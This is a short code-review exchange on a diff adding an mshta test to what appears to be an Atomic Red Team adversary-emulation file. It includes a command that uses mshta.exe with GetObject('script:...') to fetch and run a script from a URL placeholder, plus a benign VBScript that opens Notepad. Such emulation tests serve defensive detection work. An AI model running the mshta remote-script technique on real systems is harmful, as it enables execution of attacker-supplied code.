atomics/T1170/T1170.yaml

```diff
@@ -18,3 +18,132 @@ atomic_tests:
     command: |
       mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
       
+
+- name: Mshta calls a local vbs file to launch Notepad.exe
+  description: Tests execution of a local program by a VBScript file called by Mshta
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    local_file: 
+      description: create a local vbs file
+      type: strings
+      default: Set objShell = WScript.CreateObject("WScript.Shell") objShell.Run ("%windir%\notepad.exe ")
```

Comment:
This should be a default local_file path and description. Also note that local_file_path below won't match this local_file input argument. These should be consistent.

Reply:
Updated to include the changes. 
Where do you I include contents of the script file?
`
![image](https://user-images.githubusercontent.com/5214741/58751856-9ad06e80-8472-11e9-9175-68deee69cdd0.png)
`